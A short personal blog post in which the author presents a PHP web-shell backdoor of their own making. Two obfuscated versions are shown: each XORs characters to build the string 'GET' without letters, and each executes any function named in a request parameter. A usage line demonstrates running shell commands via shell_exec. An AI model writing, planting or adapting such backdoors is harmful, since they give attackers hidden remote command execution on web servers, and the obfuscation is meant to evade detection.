Non-alphanumeric PHP Simple Backdoor

After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor.

<?
$_="{"; #XOR char
$_=($_^"<").($_^">;").($_^"/"); #XOR = GET
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

well, it’s a quite simple script, just a XOR function over strings. By XOR-ing “<>/” with “{” we have “GET” string as the result. Put the result in one-liner code execution and done.

Another version with “<pre>” tag.

<?
$_="{"; #XOR char
$__=($_^"+").($_^")").($_^">"); #XOR = PRE
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?="<".$__.">".${'_'.$_}["_"](${'_'.$_}["__"]);?>

How to:

blabla.php?_=shell_exec&__=id

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About Hanny Haliwela

try to be or not try to be